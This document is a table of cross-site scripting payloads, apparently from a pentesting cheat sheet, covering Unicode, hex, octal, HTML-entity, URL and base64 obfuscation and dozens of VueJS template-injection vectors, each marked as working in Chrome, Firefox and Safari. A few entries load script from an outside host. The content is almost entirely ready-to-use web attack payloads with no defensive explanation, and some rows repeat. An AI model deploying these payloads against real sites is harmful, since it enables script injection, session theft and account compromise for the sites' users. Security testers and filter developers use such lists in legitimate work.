### XSS Payloads

| **Payload**                                                                                             | **Description**                                                     | **Chrome** | **Firefox** | **Safari** |
|---------------------------------------------------------------------------------------------------------|---------------------------------------------------------------------|------------|-------------|------------|
| `<script>\u{61}lert(1)</script>`                                                                      | Unicode escapes ES6 style                                          | Works      | Works       | Works      |
| `<script>\u{0000000061}lert(1)</script>`                                                               | Unicode escapes ES6 style zero padded                              | Works      | Works       | Works      |
| `<script>eval('\x61lert(1)')</script>`                                                                 | Hex encoding JavaScript escapes                                    | Works      | Works       | Works      |
| `<script>eval('\141lert(1)')</script> <script>eval('alert(\061)')</script> <script>eval('alert(\61)')</script>` | Octal encoding                                                     | Works      | Works       | Works      |
| `<a href="&#106;avascript:alert(1)">XSS</a><a href="&#106avascript:alert(1)">XSS</a>`              | Decimal encoding with optional semi-colon                           | Works      | Works       | Works      |
| `<svg><script>&#97;lert(1)</script></svg> <svg><script>&#x61;lert(1)</script></svg> <svg><script>alert&NewLine;(1)</script></svg> <svg><script>x="&quot;,alert(1)//";</script></svg>` | SVG script with HTML encoding                                        | Works      | Works       | Works      |
| `<a href="&#0000106avascript:alert(1)">XSS</a>`                                                      | Decimal encoding with padded zeros                                  | Works      | Works       | Works      |
| `<a href="&#x6a;avascript:alert(1)">XSS</a>`                                                         | Hex encoding entities                                               | Works      | Works       | Works      |
| `<a href="j&#x61vascript:alert(1)">XSS</a> <a href="&#x6a avascript:alert(1)">XSS</a> <a href="&#x6a avascript:alert(1)">XSS</a>` | Hex encoding without semi-colon provided next character is not a-f0-9 | Works      | Works       | Works      |
| `<a href="&#x0000006a;avascript:alert(1)">XSS</a>`                                                   | Hex encoding with padded zeros                                      | Works      | Works       | Works      |
| `<a href="&#X6A;avascript:alert(1)">XSS</a>`                                                          | Hex encoding is not case sensitive                                 | Works      | Works       | Works      |
| `<a href="javascript&colon;alert(1)">XSS</a> <a href="java&Tab;script:alert(1)">XSS</a> <a href="java&NewLine;script:alert(1)">XSS</a> <a href="javascript&colon;alert&lpar;1&rpar;">XSS</a>` | HTML entities                                                       | Works      | Works       | Works      |
| `<a href="javascript:x='%27-alert(1)-%27';">XSS</a>`                                                 | URL encoding                                                        | Works      | Works       | Works      |
| `<a href="javascript:x='&percnt;27-alert(1)-%27';">XSS</a>`                                         | HTML entities and URL encoding                                      | Obfuscation| Works       | Works      |
| `<script src=data:text/javascript;base64,YWxlcnQoMSk=></script>`                                    | Data protocol inside script src with base64                         | Works      | Works       | Works      |
| `<script src=data:text/javascript;base64,&#x59;&#x57;&#x78;&#x6c;&#x63;&#x6e;&#x51;&#x6f;&#x4d;&#x53;&#x6b;&#x3d;></script>` | Data protocol inside script src with base64 and HTML entities       | Works      | Works       | Works      |
| `<script src=data:text/javascript;base64,%59%57%78%6c%63%6e%51%6f%4d%53%6b%3d></script>`            | Data protocol inside script src with base64 and URL encoding        | Works      | Works       | Works      |
| `<iframe srcdoc=&lt;script&gt;alert&lpar;1&rpar;&lt;&sol;script&gt;></iframe>`                       | Iframe srcdoc HTML encoded                                           | Works      | Works       | Works      |
| `<iframe src="javascript:'&#x25;&#x33;&#x43;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x25;&#x33;&#x43;&#x25;&#x32;&#x46;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;'"></iframe>` | Iframe JavaScript URL with HTML and URL encoding                    | Works      | Works       | Does not work |
| `<svg><script>&#x5c;&#x75;&#x30;&#x30;&#x36;&#x31;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x63;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x35;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x32;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x34;(1)</script></svg>` | SVG script with unicode escapes and HTML encoding                    | Works      | Works       | Works      |
| `<img src=x onerror=location=atob`amF2YXNjcmlwdDphbGVydChkb2N1bWVudC5kb21haW4p`>`                | Img tag with base64 encoding                                        | Works      | Works       | Works      |
| `{{constructor.constructor('alert(1)')()}}`                                                            | VueJS reflected                                                      | Works      | Works       | Works      |
| `<div v-html="''.constructor.constructor('alert(1)')()">a</div>`                                      | VueJS reflected                                                      | Works      | Works       | Works      |
| `<x v-html=_c.constructor('alert(1)')()>`                                                               | VueJS reflected                                                      | Works      | Works       | Works      |
| `<x v-if=_c.constructor('alert(1)')()>`                                                                 | VueJS reflected                                                      | Works      | Works       | Works      |
| `{{_c.constructor('alert(1)')()}}`                                                                      | VueJS reflected                                                      | Works      | Works       | Works      |
| `{{_v.constructor('alert(1)')()}}`                                                                      | VueJS reflected                                                      | Works      | Works       | Works      |
| `{{_s.constructor('alert(1)')()}}`                                                                      | VueJS reflected                                                      | Works      | Works       | Works      |
| `<p v-show="_c.constructor`alert(1)`()">`                                                                 | VueJS reflected                                                      | Works      | Works       | Works      |
| `<x v-on:click='_b.constructor`alert(1)`()'>click</x>`                                                  | VueJS reflected                                                      | Works      | Works       | Works      |
| `<x v-bind:a='_b.constructor`alert(1)`()'>`                                                               | VueJS reflected                                                      | Works      | Works       | Works      |
| `<x @[_b.constructor`alert(1)`()]>`                                                                       | VueJS reflected                                                      | Works      | Works       | Works      |
| `<x :[_b.constructor`alert(1)`()]>`                                                                       | VueJS reflected                                                      | Works      | Works       | Works      |
| `<p v-=_c.constructor`alert(1)`()>`                                                                     | VueJS reflected                                                      | Works      | Works       | Works      |
| `<x #[_c.constructor`alert(1)`()]>`                                                                      | VueJS reflected                                                      | Works      | Works       | Works      |
| `<p :=_c.constructor`alert(1)`()>`                                                                       | VueJS reflected                                                      | Works      | Works       | Works      |
| `{{_c.constructor('alert(1)')()}}`                                                                      | VueJS reflected                                                      | Works      | Works       | Works      |
| `{{_b.constructor`alert(1)`()}}`                                                                         | VueJS reflected                                                      | Works      | Works       | Works      |
| `<x v-bind:is="'script'" src="//14.rs" />`                                                               | VueJS reflected                                                      | Works      | Works       | Works      |
| `<x is=script src=//⑭.₨>`                                                                              | VueJS reflected                                                      | Works      | Works       | Works      |
| `<x @click='_b.constructor`alert(1)`()'>click</x>`                                                      | VueJS reflected                                                      | Works      | Works       | Works      |
| `<x @[_b.constructor`alert(1)`()]>`                                                                       | VueJS reflected                                                      | Works      | Works       | Works      |
| `<x :[_b.constructor`alert(1)`()]>`                                                                       | VueJS reflected                                                      | Works      | Works       | Works      |
| `<x #[_c.constructor`alert(1)`()]>`                                                                      | VueJS reflected                                                      | Works      | Works       | Works      |
| `<x title"="&lt;iframe&Tab;onload&Tab;=alert(1)&gt;">`                                                 | VueJS reflected                                                      | Works      | Works       | Works      |
| `<x title"="&lt;iframe&Tab;onload&Tab;=setTimeout(/alert(1)/.source)&gt;">`                           | VueJS reflected                                                      | Works      | Works       | Works      |
| `<xyz<img/src onerror=alert(1)>>`                                                                        | VueJS reflected                                                      | Works      | Works       | Works      |
| `<svg><svg><b><noscript>&lt;/noscript&gt;&lt;iframe&Tab;onload=setTimeout(/alert(1)/.source)&gt;</noscript></b></svg>` | SVG script and noscript                                             | Works      | Works       | Works      |
| `<a @['c\lic\u{6b}']="_c.constructor('alert(1)')()">test</a>`                                         | VueJS reflected                                                      | Works      | Works       | Works      |
| `{{$el.ownerDocument.defaultView.alert(1)}}`                                                             | VueJS reflected                                                      | Works      | Works       | Works      |
| `{{$el.innerHTML='\u003cimg src onerror=alert(1)\u003e'}}`                                              | VueJS reflected                                                      | Works      | Works       | Works      |
| `<img src @error=e=$event.path.pop().alert(1)>`                                                         | VueJS reflected                                                      | Works      | Works       | Works      |
| `<img src @error=e=$event.composedPath().pop().alert(1)>`                                                | VueJS reflected                                                      | Works      | Works       | Works      |
| `<img src @error=this.alert(1)>`                                                                         | VueJS reflected                                                      | Works      | Works       | Works      |
| `<svg@load=this.alert(1)>`                                                                             | VueJS reflected                                                      | Works      | Works       | Works      |
| `<p slot-scope="){}}])+this.constructor.constructor('alert(1)')()})};//">`                             | VueJS reflected                                                      | Works      | Works       | Works      |
| `{{_openBlock.constructor('alert(1)')()}}`                                                               | VueJS reflected                                                      | Works      | Works       | Works      |
| `{{_createBlock.constructor('alert(1)')()}}`                                                             | VueJS reflected                                                      | Works      | Works       | Works      |
| `{{_toDisplayString.constructor('alert(1)')()}}`                                                        | VueJS reflected                                                      | Works      | Works       | Works      |
| `{{_createVNode.constructor('alert(1)')()}}`                                                            | VueJS reflected                                                      | Works      | Works       | Works      |
| `<p v-show=_createBlock.constructor`alert(1)`()>`                                                        | VueJS reflected                                                      | Works      | Works       | Works      |
| `<x @[_openBlock.constructor`alert(1)`()]>`                                                              | VueJS reflected                                                      | Works      | Works       | Works      |
| `<x @[_capitalize.constructor`alert(1)`()]>`                                                             | VueJS reflected                                                      | Works      | Works       | Works      |
| `<x @click=_withCtx.constructor`alert(1)`()>click</x>`                                                  | VueJS reflected                                                      | Works      | Works       | Works      |
| `<x @click=$event.view.alert(1)>click</x>`                                                               | VueJS reflected                                                      | Works      | Works       | Works      |
| `{{_Vue.h.constructor`alert(1)`()}}`                                                                      | VueJS reflected                                                      | Works      | Works       | Works      |
| `{{$emit.constructor`alert(1)`()}}`                                                                      | VueJS reflected                                                      | Works      | Works       | Works      |
| `<teleport to=script:nth-child(2)>alert&lpar;1&rpar;</teleport></div><script></script>`                 | VueJS reflected                                                      | Works      | Works       | Works      |
| `<teleport to=script:nth-child(2)>alert&lpar;1&rpar;</teleport></div><script></script>`                 | VueJS reflected                                                      | Works      | Works       | Works      |
| `<component is=script text=alert(1)>`                                                                   | VueJS reflected                                                      | Works      | Works       | Works      |
